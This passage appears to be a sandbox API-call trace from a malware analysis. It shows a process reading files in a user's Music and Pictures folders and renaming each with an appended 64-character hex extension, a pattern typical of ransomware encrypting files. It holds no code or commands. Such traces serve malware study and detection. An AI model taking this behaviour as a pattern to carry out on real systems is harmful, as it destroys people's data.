Size=0x142) returned 0x3369440 [0124.714] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x24fff60, FileInformation=0x3369440, Length=0x142, FileInformationClass=0xa) returned 0x0 [0124.715] CloseHandle (hObject=0x334) returned 1 [0124.715] GetProcessHeap () returned 0x600000 [0124.715] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.716] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.721] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x4200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.721] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.722] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.723] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\5ZiFIWN4Em.mp3", lpString2=".F0BCC612225EA2BDB5FD0782FFA16BADA500BEFA431F78D9AD9D621408438461" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\5ZiFIWN4Em.mp3.F0BCC612225EA2BDB5FD0782FFA16BADA500BEFA431F78D9AD9D621408438461") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\5ZiFIWN4Em.mp3.F0BCC612225EA2BDB5FD0782FFA16BADA500BEFA431F78D9AD9D621408438461" [0124.723] GetProcessHeap () returned 0x600000 [0124.723] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x14e) returned 0x311a330 [0124.723] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x24fff60, FileInformation=0x311a330, Length=0x14e, FileInformationClass=0xa) returned 0x0 [0124.724] CloseHandle (hObject=0x334) returned 1 [0124.725] GetProcessHeap () returned 0x600000 [0124.725] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.725] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.731] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.731] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.733] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.733] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\cR-e0tQ.m4a", lpString2=".2EBCAA5E7A6CCA26E8DF7437C1C4CFAFB0C2A08D40B338F2D1D025B6CABAD82A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\cR-e0tQ.m4a.2EBCAA5E7A6CCA26E8DF7437C1C4CFAFB0C2A08D40B338F2D1D025B6CABAD82A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\cR-e0tQ.m4a.2EBCAA5E7A6CCA26E8DF7437C1C4CFAFB0C2A08D40B338F2D1D025B6CABAD82A" [0124.733] GetProcessHeap () returned 0x600000 [0124.733] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x148) returned 0x3369c50 [0124.733] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x24fff60, FileInformation=0x3369c50, Length=0x148, FileInformationClass=0xa) returned 0x0 [0124.735] CloseHandle (hObject=0x334) returned 1 [0124.735] GetProcessHeap () returned 0x600000 [0124.735] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.735] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.740] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.741] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.742] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.779] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\oJ25aEVrgUC1HCFp.mp3", lpString2=".B461AADFCE00C70DEE615F5DFD3F9B96FE8697B00569A3CBC06214C2CB638C3B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\oJ25aEVrgUC1HCFp.mp3.B461AADFCE00C70DEE615F5DFD3F9B96FE8697B00569A3CBC06214C2CB638C3B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\oJ25aEVrgUC1HCFp.mp3.B461AADFCE00C70DEE615F5DFD3F9B96FE8697B00569A3CBC06214C2CB638C3B" [0124.779] GetProcessHeap () returned 0x600000 [0124.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15a) returned 0x336a738 [0124.779] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x24fff60, FileInformation=0x336a738, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0124.782] CloseHandle (hObject=0x334) returned 1 [0124.783] GetProcessHeap () returned 0x600000 [0124.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.783] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.979] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.979] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.984] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x24fff70) returned 0x0 [0124.984] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wrP-HT0.wav", lpString2=".5C11066C915EB50596371ED9D870E1FA5C707CC27398E2632A950BC9FFE9D522" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wrP-HT0.wav.5C11066C915EB50596371ED9D870E1FA5C707CC27398E2632A950BC9FFE9D522") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wrP-HT0.wav.5C11066C915EB50596371ED9D870E1FA5C707CC27398E2632A950BC9FFE9D522" [0124.984] GetProcessHeap () returned 0x600000 [0124.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x134) returned 0x3151e68 [0124.984] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x24fff60, FileInformation=0x3151e68, Length=0x134, FileInformationClass=0xa) returned 0x0 [0124.985] CloseHandle (hObject=0x32c) returned 1 [0124.985] GetProcessHeap () returned 0x600000 [0124.985] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.986] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.987] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0124.988] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pu7woVnhqrGI.wav", lpString2=".A002DF7C1C45A704A57E0D9C3412F5D3E3B6818D58F5969EB3AA2843CECFB15C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pu7woVnhqrGI.wav.A002DF7C1C45A704A57E0D9C3412F5D3E3B6818D58F5969EB3AA2843CECFB15C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pu7woVnhqrGI.wav.A002DF7C1C45A704A57E0D9C3412F5D3E3B6818D58F5969EB3AA2843CECFB15C" [0124.988] GetProcessHeap () returned 0x600000 [0124.988] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x116) returned 0x3117e28 [0124.988] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x24fff60, FileInformation=0x3117e28, Length=0x116, FileInformationClass=0xa) returned 0x0 [0124.989] CloseHandle (hObject=0x33c) returned 1 [0124.992] GetProcessHeap () returned 0x600000 [0124.992] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0124.993] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.994] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x24fff70) returned 0x0 [0124.995] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\R2nOG7Kqkcj.wav", lpString2=".838220C16EDBEFFECE3A359F8674012B1FD66A5343D80751C01F9FC2B2407648" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\R2nOG7Kqkcj.wav.838220C16EDBEFFECE3A359F8674012B1FD66A5343D80751C01F9FC2B2407648") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\R2nOG7Kqkcj.wav.838220C16EDBEFFECE3A359F8674012B1FD66A5343D80751C01F9FC2B2407648" [0124.995] GetProcessHeap () returned 0x600000 [0124.995] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x114) returned 0x3118d30 [0124.995] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3118d30, Length=0x114, FileInformationClass=0xa) returned 0x0 [0124.996] CloseHandle (hObject=0x31c) returned 1 [0124.996] GetProcessHeap () returned 0x600000 [0124.996] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0124.998] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.007] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.007] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.008] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.008] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\_r 1WSjC4hA.m4a", lpString2=".D249605674D558C4F04830AF3B0446FD76892DB4A4F47F27024DF6DE16C07237" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\_r 1WSjC4hA.m4a.D249605674D558C4F04830AF3B0446FD76892DB4A4F47F27024DF6DE16C07237") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\_r 1WSjC4hA.m4a.D249605674D558C4F04830AF3B0446FD76892DB4A4F47F27024DF6DE16C07237" [0125.008] GetProcessHeap () returned 0x600000 [0125.008] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x114) returned 0x3117f50 [0125.009] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x3117f50, Length=0x114, FileInformationClass=0xa) returned 0x0 [0125.011] CloseHandle (hObject=0x328) returned 1 [0125.011] GetProcessHeap () returned 0x600000 [0125.011] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.011] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.027] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.027] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.028] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.028] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\1JUnHazFTyA.png", lpString2=".0EAC96F8AED003E5B057EDC3B8D8BADF63D453475BFA47B150F8830B13EE5D6E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\1JUnHazFTyA.png.0EAC96F8AED003E5B057EDC3B8D8BADF63D453475BFA47B150F8830B13EE5D6E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\1JUnHazFTyA.png.0EAC96F8AED003E5B057EDC3B8D8BADF63D453475BFA47B150F8830B13EE5D6E" [0125.028] GetProcessHeap () returned 0x600000 [0125.028] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11a) returned 0x3118518 [0125.028] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x3118518, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0125.029] CloseHandle (hObject=0x328) returned 1 [0125.030] GetProcessHeap () returned 0x600000 [0125.030] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.030] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.034] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.034] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.035] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.035] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\4rFQmUQ.gif", lpString2=".8C6D77366974E526A162EEC3D8936F3F1DAAC6DC5A70EF6CC80F66801388A834" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\4rFQmUQ.gif.8C6D77366974E526A162EEC3D8936F3F1DAAC6DC5A70EF6CC80F66801388A834") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\4rFQmUQ.gif.8C6D77366974E526A162EEC3D8936F3F1DAAC6DC5A70EF6CC80F66801388A834" [0125.035] GetProcessHeap () returned 0x600000 [0125.035] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13a) returned 0x311a5a0 [0125.035] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x311a5a0, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0125.036] CloseHandle (hObject=0x31c) returned 1 [0125.037] GetProcessHeap () returned 0x600000 [0125.037] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.037] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.040] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.040] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.041] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.042] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\AZJ2s3YFVbXw.gif", lpString2=".F0999A56BE654F90BC11B007FE5645FA428A0FC5D0DED6899A70D686941FD133" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\AZJ2s3YFVbXw.gif.F0999A56BE654F90BC11B007FE5645FA428A0FC5D0DED6899A70D686941FD133") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\AZJ2s3YFVbXw.gif.F0999A56BE654F90BC11B007FE5645FA428A0FC5D0DED6899A70D686941FD133" [0125.042] GetProcessHeap () returned 0x600000 [0125.042] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x144) returned 0x3369da8 [0125.042] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3369da8, Length=0x144, FileInformationClass=0xa) returned 0x0 [0125.043] CloseHandle (hObject=0x31c) returned 1 [0125.043] GetProcessHeap () returned 0x600000 [0125.043] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.044] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.049] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.049] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.050] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.050] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\BMpO5L_W.gif", lpString2=".72995E156F9C3AECF85F8F8483EE4CF447C81E862D232DC622620C6B9742246B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\BMpO5L_W.gif.72995E156F9C3AECF85F8F8483EE4CF447C81E862D232DC622620C6B9742246B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\BMpO5L_W.gif.72995E156F9C3AECF85F8F8483EE4CF447C81E862D232DC622620C6B9742246B" [0125.050] GetProcessHeap () returned 0x600000 [0125.050] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13c) returned 0x311a6e8 [0125.050] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x311a6e8, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0125.051] CloseHandle (hObject=0x31c) returned 1 [0125.051] GetProcessHeap () returned 0x600000 [0125.052] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.052] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.055] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.055] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.056] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.057] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\bRklnnBk.gif", lpString2=".C93DF9D3544096AF132122929ACAD734F537625DFC31AEDD413BAB41567A7D0A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\bRklnnBk.gif.C93DF9D3544096AF132122929ACAD734F537625DFC31AEDD413BAB41567A7D0A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\bRklnnBk.gif.C93DF9D3544096AF132122929ACAD734F537625DFC31AEDD413BAB41567A7D0A" [0125.057] GetProcessHeap () returned 0x600000 [0125.057] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13c) returned 0x311a830 [0125.057] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x311a830, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0125.058] CloseHandle (hObject=0x31c) returned 1 [0125.058] GetProcessHeap () returned 0x600000 [0125.058] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.059] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.073] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x7600, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.073] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.075] NtQueryObject (in: Handle=0x31c, 